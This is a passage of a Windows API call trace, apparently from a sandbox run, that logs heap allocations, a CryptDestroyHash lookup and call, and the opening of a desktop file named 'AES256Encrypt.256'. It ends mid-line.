lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0134.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0134.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cb0 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0134.818] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0134.819] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0134.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0134.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0134.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0134.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0134.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0134.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0134.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0134.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0134.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0134.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0134.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0134.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0134.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0134.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a68 [0134.820] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a68, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0134.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0134.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0134.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0134.820] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0134.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0134.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0134.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.821] CryptDestroyHash (hHash=0xa86f50) returned 1 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0134.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0134.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0134.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0134.842] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0134.842] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0134.843] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0134.843] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0134.843] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0134.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0134.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0134.844] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0134.844] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545d0 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547d8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0134.845] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0134.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0134.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0134.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0134.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0134.846] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0134.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0134.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0134.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0134.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0134.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0134.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0134.846] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0134.846] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0134.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0134.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2e80330 [0134.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0134.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0134.847] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/AES256Encrypt.256" (normalized: "c:\\users\\fd1hvy\\desktop\\aes256encrypt.256"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0134.847] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.847] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0134.847] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0134.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0134.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a40 | out: hHeap=0x970000) returned 1 [0134.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0134.847] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0134.847] HeapFree 